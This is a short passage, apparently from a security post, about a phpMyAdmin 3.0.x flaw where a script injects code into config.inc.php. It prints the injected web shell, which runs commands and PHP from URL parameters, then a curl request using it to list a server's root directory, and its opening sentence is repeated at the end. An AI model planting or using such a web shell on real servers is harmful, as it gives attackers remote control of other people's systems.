It\'s a bash script that injects code into config.php allowing remote code execution:
$cfg[\'Servers\'][$i][\'host\']=\'\'; if($_GET[\'c\']){echo
\'(pre)\';system($_GET[\'c\']);echo \'(/pre)\';}if($_GET[\'p\']){echo
\'(pre)\';eval($_GET[\'p\']);echo \'(/pre)\';};//\'] = \'localhost\';
By the way, in a infected system we could execute some commands like this:
$ curl \"http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/\"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
[...]
I think you would read the proof of concept carefully.
It\'s a bash script that injects code into config.php allowing remote code execution: